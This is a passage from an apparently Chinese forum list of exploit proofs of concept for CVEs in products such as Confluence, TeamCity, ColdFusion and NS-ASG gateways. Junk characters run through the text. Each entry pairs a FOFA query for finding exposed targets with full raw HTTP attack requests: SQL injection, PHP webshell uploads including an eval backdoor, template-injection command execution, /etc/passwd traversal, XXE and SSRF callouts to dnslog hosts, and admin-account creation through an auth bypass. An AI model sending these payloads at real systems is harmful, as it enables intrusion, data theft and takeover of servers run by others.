  G5 T/ b8 Z; B2 H- R* uCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee. u1 t* _, m! \* h( |% J. t! o* j4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
$ b! n; _5 N! T+ ^/ }! W! l( GAccept: */*/ b3 W- G" |9 i3 C. t# b/ m: w4 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 O6 p$ n  G3 Z  FAccept-Encoding: gzip, deflate* s: i! N9 t5 m9 F3 e/ X6 B" K0 L. e
Content-Type: application/x-www-form-urlencoded;& v+ l6 }% j1 |& h" x
Content-Length: 109+ |/ F7 O$ n# G7 @, c+ o+ U
Origin: https://58.18.133.60:84431 H6 I% m2 O, e/ a
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php$ I1 i' j# ?: y* d/ \% G
Sec-Fetch-Dest: empty6 ]) F# w7 q5 `' F- ]; t+ u( S$ I7 G
Sec-Fetch-Mode: cors9 w' @  E: H1 Z4 z1 f; E1 w, Q  }+ k
Sec-Fetch-Site: same-origin
0 U! Y3 ]$ H4 k+ W" `. z( QX-Forwarded-For: 1.1.1.1* U0 ^/ t0 e0 x
X-Originating-Ip: 1.1.1.1
* D- F8 X* _. d5 }$ z( {X-Remote-Ip: 1.1.1.1
+ @+ l9 _! ?2 u; A. H& LX-Remote-Addr: 1.1.1.1
- C" {! p8 H4 _; {6 {) {Te: trailers3 S  Y3 E- g6 ^8 i+ L
Connection: close
3 ?; D; y2 d# N6 u+ i; n; P1 w. D+ f8 e& {% U! H5 w: N
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
8 G& O6 j# |  w6 h- h3 d+ Y
+ u3 f, O9 v6 p1 Z. G
- T. u: b: k) }120. 北京百绰智能S40管理平台导入web.php任意文件上传
' R$ k+ j8 v# UCVE-2024-1253
, q! ~8 a1 B" G. s, dFOFA:title="Smart管理平台". a4 B4 D% s9 y9 H* I0 B
POST /useratte/web.php? HTTP/1.17 Z# l  U( ]' S0 _
Host: ip:port3 V  T0 n0 z4 c, z0 a/ D, ?
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db7 Z6 w7 j! E4 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
7 x! }' u4 k$ jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 [$ I0 n8 H0 U4 Y! W- D2 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 X% Z1 a! E% H9 aAccept-Encoding: gzip, deflate
, m. r2 M5 u$ v# @# Q+ ^9 ~Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
, Y7 K3 t& r" j4 e1 ]/ bContent-Length: 597
: _/ h6 B( w1 l) m" p  rOrigin: https://ip:port3 M6 [) E$ _  ?& h
Referer: https://ip:port/sysmanage/licence.php# a; ]: ^+ |: y. G" H2 b! |
Upgrade-Insecure-Requests: 1
' D. u6 J8 b& X& X6 C2 xSec-Fetch-Dest: document
8 E* Y7 s; m% O, s' Z) KSec-Fetch-Mode: navigate8 l5 _# C5 x9 \: Z1 H# B
Sec-Fetch-Site: same-origin
" ?7 _9 [) O& i" z7 l# L4 s5 \Sec-Fetch-User: ?15 l" D& M% i$ n. ^
Te: trailers. E. X# O  J2 C
Connection: close" N* f5 d" \6 z" H- j

% l9 g* y5 z, Z  Q: D) V* _3 z1 o-----------------------------42328904123665875270630079328
; v% r' V! G: W$ F$ j2 SContent-Disposition: form-data; name="file_upload"; filename="2.php"
. D2 ^2 x+ F; m# N7 P) |/ R& OContent-Type: application/octet-stream0 ?# r1 r% Q7 m
4 @% @/ j7 }4 J8 Y6 O* ]
<?php phpinfo()?>3 ~* G! F; @: J4 V9 p8 z
-----------------------------42328904123665875270630079328
  |9 w6 E' T0 c) g/ j; YContent-Disposition: form-data; name="id_type"
9 i# o: q3 ?' e4 i% R" P' X/ {$ y% Z! r1 j0 P: J
1
5 v7 W7 b) n% W; x' F-----------------------------42328904123665875270630079328
- X" M. H5 j- |$ S- v6 V/ zContent-Disposition: form-data; name="1_ck"
4 o3 L6 c! Z; @) _% D
1 D+ x0 s  p9 G9 U1_radhttp0 m  E7 u; K5 j( ^. ^: [0 j5 `+ _' s6 g
-----------------------------42328904123665875270630079328
9 |% R) O( W4 ]7 P- K6 X+ {Content-Disposition: form-data; name="mode"; H/ j! Q1 _4 `- y

+ J( u" ?. r& L; U4 gimport5 w1 H- u8 V0 Q! {) [9 p
-----------------------------42328904123665875270630079328
( t3 c$ F0 M1 t+ ~4 g! a% }' ?% `3 |# H
2 O  H: t" X: N, \
文件路径/upload/2.php. @. @# \2 P; _# O8 w8 [2 }  x- E/ N
$ k- t+ L! [0 r* p2 X( i
121. 北京百绰智能S42管理平台userattestation.php任意文件上传# I1 E  ?' d3 E) u+ h+ j
CVE-2024-1918) T2 H, T9 A- u3 V, G6 v& w
FOFA:title="Smart管理平台"
7 E5 S) ^' B5 \( z% M  ?POST /useratte/userattestation.php HTTP/1.17 j7 A0 w% `2 D. U! \) d: g3 ~, ~: R
Host: 192.168.40.130:8443
' i0 z+ S; }& |; h) N8 a0 m4 ?Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50# ~8 d7 o1 |6 p+ J+ U2 K: @5 T
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( p# N' |: h. N  BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. p. I% [1 J) z  \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 ~1 [8 v* P% d$ v6 N
Accept-Encoding: gzip, deflate
0 D) C! y. o! u6 T( nContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328% o8 c. `! g7 W% q
Content-Length: 592
5 K; q  [4 l+ ^+ JOrigin: https://192.168.40.130:8443" C6 A1 \% ~0 D5 j! S2 @' s1 L( l' g
Upgrade-Insecure-Requests: 1
; k  Q- _3 l- @( J( dSec-Fetch-Dest: document1 [: b0 N9 V$ I  T( ?+ r
Sec-Fetch-Mode: navigate  S+ J. h! z, ~2 m) l% Q5 v8 `
Sec-Fetch-Site: same-origin8 Z  [% L% P  u- z
Sec-Fetch-User: ?1; d3 ]$ c$ ~7 Y3 k
Te: trailers
1 K6 T1 i- {& M0 \# C; \/ XConnection: close* K6 N# j& ]) k7 g8 d& i1 p' y
& E3 S9 ~8 y; s- K; t
-----------------------------423289041236658752706300793286 e) ?: U8 A" a6 [2 K: M
Content-Disposition: form-data; name="web_img"; filename="1.php". C. O3 w5 q+ [& I3 d( n) f
Content-Type: application/octet-stream; y$ S: I- ?5 S7 E
0 Q$ A+ S" ?$ D4 \7 [
<?php phpinfo();?>
+ K4 A% O2 m) a-----------------------------42328904123665875270630079328
3 q) z1 F. O# sContent-Disposition: form-data; name="id_type"
/ ^# m4 @# F% q' y* K- @
# N# ]$ x' T. Q$ s) [2 m1
3 Z  q5 b3 H7 }$ a7 g2 H" Y7 I. \-----------------------------42328904123665875270630079328
$ m2 I) E- _7 {, r/ A9 ^% w' OContent-Disposition: form-data; name="1_ck") U# w8 \6 C7 y9 q. _

# B5 G# O4 m' u1_radhttp
8 f$ z& O/ R- Z2 C" ^. j# s! {) ]-----------------------------42328904123665875270630079328
3 V$ f* G" ^$ I, K1 K. UContent-Disposition: form-data; name="hidwel"* v1 t5 B$ F4 }

9 x1 R' t  k4 n2 _set
  A  x6 a" J; ?. b$ _* [-----------------------------42328904123665875270630079328( k6 q) ^# b6 w5 t& N/ {
7 Y! ]0 R5 h0 u1 s& t2 i
2 z2 A5 w4 i: a- U. I! S, |4 N1 r
boot/web/upload/weblogo/1.php
$ j* R' h" ]; z( `6 _- S- r- y! }0 n6 \) A. G7 J/ r) V
122. 北京百绰智能s200管理平台/importexport.php sql注入
  a$ G7 G$ Y' l: I0 J4 `CVE-2024-27718FOFA:title="Smart管理平台"
" \  |1 f5 C, e) g* k其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()7 K7 r; s% Y: \8 }8 D  z- R0 Y
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1* }$ W# u) f& g# q
Host: x.x.x.x
8 G* J& s) y# u' R, ?% Z. N" z" cCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0. L' [* \9 S, e# |: T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" @" c' @& t" [  c) S( pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ k* ^6 y! u6 ?! D' s4 T9 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ h8 H. U3 G$ {5 I- XAccept-Encoding: gzip, deflate, br$ R, I, k3 R4 t- k" {, [8 K: T  [- j
Upgrade-Insecure-Requests: 1
7 T- r2 V1 l! _1 K8 x: o1 xSec-Fetch-Dest: document
1 k1 N4 l+ k( Q/ S- a8 ISec-Fetch-Mode: navigate
1 `3 _/ {1 S4 N* N1 b& o+ b4 v2 a, hSec-Fetch-Site: none
# p2 ^2 d; Y0 N( BSec-Fetch-User: ?1: {+ l/ |0 P! }
Te: trailers" x( H) |4 N' w2 }  U
Connection: close
" `, j- W8 d  b/ ]; W
3 ~" E. \* d8 e; s# l4 q" |0 M* s+ H. E7 \7 z5 p+ C/ L6 w
123. Atlassian Confluence 模板注入代码执行( U' h" J9 n4 i
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
% j  ~4 f1 j' \" Y6 VPOST /template/aui/text-inline.vm HTTP/1.1
' m: h- T$ Z# iHost: localhost:8090
$ g6 o3 n" B, S' _6 X. aAccept-Encoding: gzip, deflate, br
1 J2 C2 G. _" w/ k% L* cAccept: */*
1 m8 T) o5 E. W& O/ ~Accept-Language: en-US;q=0.9,en;q=0.89 I# A& C" r0 m+ j  }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.369 e8 w# U- u1 k- b8 D
Connection: close% R$ a( E0 D8 y8 e- G( A
Content-Type: application/x-www-form-urlencoded" I6 C' n3 W5 @

$ N* o4 U2 J" m8 w( P) ^9 Nlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
) H- b; ~7 o& K5 p6 r9 M, w; T# Z' H8 G5 N+ Z% N
  ?. S3 O9 o& e7 q: W8 Z; v2 V
124. 湖南建研工程质量检测系统任意文件上传
" p4 s- l8 v/ n/ MFOFA:body="/Content/Theme/Standard/webSite/login.css"+ Y# g+ D' W0 ?  n8 w3 U, z8 B
POST /Scripts/admintool?type=updatefile HTTP/1.1: D( j0 Y: f) [6 p" A
Host: 192.168.40.130:8282
/ e. Y) f/ m+ L; y7 MUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( ^: ?; A9 ~( Z% y$ Z' E2 GContent-Length: 727 _8 x0 p- T0 c# L& d4 j: \6 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
' _) g. b3 Q, T/ ]+ cAccept-Encoding: gzip, deflate, br
8 s, q" R* _! R: w0 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 y: F. u0 m: p% ?* t3 J- bConnection: close9 i7 e! w5 _" E2 w: h0 W, V
Content-Type: application/x-www-form-urlencoded
& J2 Z+ r; t4 c3 ?6 q& {
/ P% S; W; X* efilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>" K3 B  d8 ~* O$ R0 S0 L

$ `7 i7 Y( |$ v2 F: U$ V5 p1 M& F+ I+ Y8 c) d" [# I) c
http://192.168.40.130:8282/Scripts/abcgcg.aspx# b! g$ i2 P: `& q9 ]
5 `: y; h6 F/ {% B! C% A$ f
125. ConnectWise ScreenConnect身份验证绕过2 `% T( M# _: S# D  ]
CVE-2024-1709" P6 s' V3 i' G6 V' ~1 f
FOFA:icon_hash="-82958153"
% T/ X$ U0 i2 Bhttps://github.com/watchtowrlabs ... bypass-add-user-poc3 d8 y+ K1 H- d' u8 @. k

& Y; y% O# i0 `* V# Z. F# r
" B2 d4 T  ~+ O使用方法
: [. }2 s; i5 j3 Ypython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!: z$ e- ~$ T& E# W% I
& J. l: I' h9 y) ^& I! r  m# f- j

/ Y. O; |6 B' v& b- p" U2 Q* l1 f创建好用户后直接登录后台,可以执行系统命令。
% J6 _, A: a$ r* L7 I! a2 g
! W" W1 `, r: {+ u- C9 s2 B126. Aiohttp 路径遍历* Z4 M2 q* ?- m" B
FOFA:title=="ComfyUI"
* t; P1 {" W/ _9 r% ~GET /static/../../../../../etc/passwd HTTP/1.1
4 i1 o" O3 A% Y! n8 F* `Host: x.x.x.x
2 }4 S+ u4 G; U# R: C  x4 Q! \+ {3 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ y( }1 R2 q* q! ~$ f* dConnection: close
$ i2 q; l! f5 L1 |Accept: */*
0 H0 O1 k- d, V% z3 Y2 o4 h( {Accept-Language: en
3 g7 v/ [2 d6 ]+ nAccept-Encoding: gzip8 O, L2 |+ E( b% m  o

& N0 m! r) j4 p* E7 b
" L# m+ v/ |& z/ N$ g127. 广联达Linkworks DataExchange.ashx XXE
4 `& p8 R4 @4 O+ Z- cFOFA:body="Services/Identification/login.ashx"
; }' a0 r* w% C; r: jPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1. A: c* b+ _: e* J# F; a; ~) w
Host: 192.168.40.130:88880 N0 o, ~2 J1 V; J( Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
) _0 A/ y; Z2 X3 wContent-Length: 4152 F$ s* n7 [/ |; c- X9 c6 j$ Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  b; y9 n4 Z* z1 R2 A/ Q
Accept-Encoding: gzip, deflate
- s" H) R" I% L; }( E; w. o8 LAccept-Language: zh-CN,zh;q=0.93 |2 `0 O6 K6 A. ~& O
Connection: close2 X4 S; U: y9 x
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0' `; U7 t! A' H% w. [
Purpose: prefetch
  f1 u! r) s$ f- s  J2 L. e2 oSec-Purpose: prefetch;prerender
; b) Q. a7 L1 f1 K, k4 ]1 ]6 ^' J# D8 Y1 o2 t
------WebKitFormBoundaryJGgV5l5ta05yAIe0
* E3 N# G, o5 b, bContent-Disposition: form-data;name="SystemName"
$ a6 a% K& I" _0 E2 _# h+ m; b) T' @1 D9 T' r2 c# c/ }. s! s
BIM
5 F" f! [3 U6 p------WebKitFormBoundaryJGgV5l5ta05yAIe0$ ]$ }5 F/ w4 s7 `
Content-Disposition: form-data;name="Params"0 t3 o# d( F6 h5 I
Content-Type: text/plain
( \8 p5 E! s2 z- H' w
3 e% o. p6 g- A0 u0 _( n1 L<?xml version="1.0" encoding="UTF-8"?>: j8 }% c& X9 B) ]
<!DOCTYPE test [
( w5 p; e7 ?/ }; y& G9 O3 x<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
3 J' }9 i6 J- l) R' L2 f% M& ?]# v& [$ b( w! E* F# F* u9 [( Z
>
4 P! y2 V6 C$ D2 W$ V0 P, W<test>&t;</test>3 d* m( B5 v% C% V* v) {
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% E9 `. ^- @) a1 t% Z8 Y$ w) f6 k, z" z( }+ {

  p# H( [2 ~& D& h: r: M2 _7 u+ T/ n: \/ ]/ X
128. Adobe ColdFusion 反序列化2 [9 `1 n# [* Y, t2 T" x& g7 C% Q
CVE-2023-38203& s% g% X) P0 ^! }& {/ l1 e: J7 H1 r( E
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)* j+ m/ F! n- P6 B, H: l& h0 C& }
FOFA:app="Adobe-ColdFusion"2 W0 r$ m% l8 \. Q7 F# Y
PAYLOAD6 V! v7 T# x1 g0 b0 a+ v$ d0 ]( J

* M& ?0 o8 E3 x6 Q* _129. Adobe ColdFusion 任意文件读取/ x0 I9 G& s% I# D
CVE-2024-20767. F  {( G1 {; F; S1 v
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"5 {0 L0 |1 X. J" k
第一步,获取uuid
' N" ]+ ?9 [* z% o3 lGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
4 V9 L* i6 Q3 Y/ W* @: u" Z& RHost: x.x.x.x" F5 d. b: u5 V! w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ u/ c$ y3 e! g2 FAccept: */*8 f( k8 O& f: V" w8 e" a3 [
Accept-Encoding: gzip, deflate. h, ?% Y$ q8 s5 L7 N
Connection: close5 j" N- I  S: E: d% q/ {' y
( y6 @  O( C( H! _3 C- o
/ S8 E8 M' l7 N+ l2 _6 F  X
第二步,读取/etc/passwd文件
& v& p6 ^5 O* KGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1) m& K# y: Z. c1 w) c3 Y
Host: x.x.x.x) d1 Y8 A# y7 n; I) P- R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
  M$ ]1 H- x$ n* l3 J# _5 mAccept: */*9 \( ~/ g; e2 U& y. {( ^3 B8 a5 y
Accept-Encoding: gzip, deflate2 [, i1 e4 m' X* U, e& l
Connection: close+ m8 V8 E* Y) s
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
7 a" \% T6 X# f! W4 d- p1 l
; ?  v4 c1 M8 D. f, Q) \0 V1 U( ?4 `
130. Laykefu客服系统任意文件上传
' ?9 e5 }: v5 `3 C& Q' Y* ]# JFOFA:icon_hash="-334624619"
% s$ m! J5 c, G; ]7 }- }* m3 lPOST /admin/users/upavatar.html HTTP/1.1
0 K( d; y( j/ ]3 w5 Z1 ~  zHost: 127.0.0.18 v, d  @7 b& K4 z
Accept: application/json, text/javascript, */*; q=0.018 B+ G# H" W7 V
X-Requested-With: XMLHttpRequest! s0 E! R( U6 v$ B) r: J
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26- m9 t: U3 D1 d! H: I$ }& y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
; a2 u- A! \) {: T8 H" XAccept-Encoding: gzip, deflate
; [7 Y2 O3 A- Y  E7 XAccept-Language: zh-CN,zh;q=0.9
# F# A. Y5 j8 N1 r+ UCookie: user_name=1; user_id=3+ W! |2 Z9 ^  h$ a: O) u% C
Connection: close
* z) J& Q7 H( @7 F& u5 a0 H" Q
5 _) o' x5 R9 o; ~5 r------WebKitFormBoundary3OCVBiwBVsNuB2kR4 d. J/ w% I  z7 J8 h
Content-Disposition: form-data; name="file"; filename="1.php"
5 \6 R9 ]' X5 [Content-Type: image/png2 o- a. j+ O" Q5 F8 R

" }( p& p: m7 T) F! m<?php phpinfo();@eval($_POST['sec']);?>
- O8 a3 j6 w; E" u- ]+ L- b------WebKitFormBoundary3OCVBiwBVsNuB2kR--
' i% l4 L4 u7 W, a: ]7 `: B# p8 c9 ?, |

8 n# b. ~: M3 ^131. Mini-Tmall <=20231017 SQL注入1 s3 [' M  m/ u
FOFA:icon_hash="-2087517259", v$ e* k/ |6 u2 a1 @
后台地址:http://localhost:8080/tmall/admin
7 O. I2 p+ O" q+ ~http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
3 \8 |. }" z4 R6 y: D6 V4 L
: F4 w, r# b( m132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
& |2 l6 G) r4 e5 l( I3 w1 A' zCVE-2024-27198
$ W6 z& B$ N. [6 }FOFA:body="Log in to TeamCity". f8 V( y3 z0 U: u+ E  ]
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
- G/ C8 E8 i+ K4 j% D8 eHost: 192.168.40.130:8111
) n1 w9 z$ I' eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ T8 g- D7 g, g! T  l# L$ m8 v$ n
Accept: */*
) q8 }2 l3 K! E+ |. Q- q7 g' J, v$ OContent-Type: application/json* l: n# b6 g+ p! a/ [  J
Accept-Encoding: gzip, deflate+ R2 i1 f: J( v

1 M! N& X. s% U5 Q* w9 }{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}6 }4 a) W9 f8 D: k4 _/ [
3 u7 h! |0 h9 m( N
# U/ s; Z# e0 R: j
CVE-2024-27199. |- z# I* v- H. E; \2 V  R' b
/res/../admin/diagnostic.jsp( d0 {4 t5 J8 {9 L/ {
/.well-known/acme-challenge/../../admin/diagnostic.jsp
" C1 M  n& j& Q, b/update/../admin/diagnostic.jsp
5 X( t0 H! u2 [( c( Z- E. v
* m( O% c9 [2 \
7 }4 S/ t9 _) R+ vCVE-2024-27198-RCE.py9 J" x5 k1 }8 y3 F# r
% h9 T6 c6 ?8 Q2 {" Z7 {
133. H5 云商城 file.php 文件上传
( O& N2 p+ ]/ O; xFOFA:body="/public/qbsp.php"
, m, }0 e6 ]) u! xPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
7 x: y* @! t. ?/ @/ T! y, S2 ?Host: your-ip  X4 ?4 ~" z/ B1 L% W4 A% W2 R: D$ V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) @- J( f/ V, ?% BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
/ P% ]. R0 _1 z1 h& H+ B( h( H
: r7 G/ |6 F9 v% B6 [" X------WebKitFormBoundaryFQqYtrIWb8iBxUCx
( T2 k$ {! \/ lContent-Disposition: form-data; name="file"; filename="rce.php"
# H! [, i" R" n/ rContent-Type: application/octet-stream4 Y. g+ r# ?& Q

4 ?9 d8 W4 m# r; v/ _: }8 T& d<?php system("cat /etc/passwd");unlink(__FILE__);?>
6 [5 h5 N3 S3 @6 j. D2 U------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
1 K% q/ O: {- k. M8 u( A4 f1 T
4 d  i5 ^  z- b0 [1 ?% V9 u" w* E3 L

1 W  m. R, v$ }% }5 k134. 网康NS-ASG应用安全网关index.php sql注入
) a- G6 f& p3 eCVE-2024-23308 d, ?5 m( R7 }9 y6 e
Netentsec NS-ASG Application Security Gateway 6.3版本  x/ ]  d6 x7 G3 z  Y
FOFA:app="网康科技-NS-ASG安全网关"
  O- E% J! J/ A$ _+ S& `3 Y0 CPOST /protocol/index.php HTTP/1.1
& n7 M* `+ e6 I% ?$ bHost: x.x.x.x
/ I$ ]/ b0 c$ BCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
$ V! o) D) H' H( H9 f2 S6 x  QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. Z& j7 m( M; S7 TAccept: */*
) q* y& \7 b& V8 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" j: N: s. Q7 q" [8 h
Accept-Encoding: gzip, deflate
$ j8 ^( A! f! ?# n, k; gSec-Fetch-Dest: empty
' X( x* a' l9 x6 j# H5 pSec-Fetch-Mode: cors
- z# T1 D9 e" T8 F# j8 iSec-Fetch-Site: same-origin* _  j: k& v* L: c! X  H
Te: trailers
* D1 ^2 f/ R! Q, _Connection: close
# p( g( t9 L6 a7 GContent-Type: application/x-www-form-urlencoded$ p# O0 \. `; h* W0 e# l
Content-Length: 2631 z, D9 C" w% t
# W1 ]0 Y+ M* r1 L% [9 s4 _2 O  @( m5 ?
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}- k8 ?, ]$ l$ p; J2 B% J

; O* t  d& T" ?; ?* _
, }. [' h" \: ]3 p9 ~! b135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
/ W6 d* U1 a/ f% lCVE-2024-2022
! y7 ~4 A( B( x7 a& i7 PNetentsec NS-ASG Application Security Gateway 6.3版本
$ ?" v7 w3 J' A8 T9 FFOFA:app="网康科技-NS-ASG安全网关"
! {' z8 t* m& i: H& kGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
* ^% x7 K: S7 N% r' [Host: x.x.x.x& S3 ?9 X" J; G/ j0 Y% ?% u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) b. F  D7 _4 z" j0 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: R$ l: C. A8 l8 `' y- ^% q. nAccept-Encoding: gzip, deflate
$ z4 \" w; y+ x) a& E( @+ H# w/ tAccept-Language: zh-CN,zh;q=0.9
4 t* C! q+ v; K; `Connection: close
7 g7 S3 B: t; R
9 @6 i# Y% ^" x- t4 M
1 {- O- r# `% o; ^136. NextChat cors SSRF, ]3 q7 s! ?: G% ?! A2 k
CVE-2023-497855 l9 z; {2 a9 I6 `# T: }
FOFA:title="NextChat"& y; P6 ~# t8 ?
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1! G% R/ M1 W( g+ ^5 a& i
Host: x.x.x.x:10000+ d8 u) l3 Q' m. K% ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( Y2 o1 G5 c8 F/ {: S: a& q2 FConnection: close& r4 K- [4 i" @9 h( b' b3 Q: J
Accept: */*
6 @" F  N9 m* q' s  e0 r- a8 V- Q% tAccept-Language: en
( f0 b1 U& m4 @Accept-Encoding: gzip! i* f/ K! l& D9 X

+ v+ j5 F9 g* }, Z# F2 Q! F4 ~! N% h7 i. E" O  A
137. 福建科立迅通信指挥调度平台down_file.php sql注入/ C  L) u0 `& v" ~8 b  N; C6 T
CVE-2024-2620
0 l3 h" C: r; |& w+ [: X# GFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- e. N3 Q& z# `5 bGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
. [: q) o# T+ q' U, v& q: B; Z" g  \* wHost: x.x.x.x$ L, O2 o; F5 B) O$ N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 M$ U" I# W* r  t, x& W* ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 F! s2 b. R: b( i6 E/ @, jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% x0 V( x! W4 a1 D. I, x9 w7 j
Accept-Encoding: gzip, deflate, br
0 f' M6 `0 ?9 {1 P- r) EConnection: close
2 s0 W$ b; X7 ~# T; ECookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj4 h9 B! H2 q) m; E
Upgrade-Insecure-Requests: 1
2 W5 o' ?2 P1 Q) O2 N4 u( K
2 T. I  m: r+ U9 g* L( V, ]; U4 @. c. u( M, g
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入/ ]0 _5 y4 c8 W- ^! \4 k
CVE-2024-2621
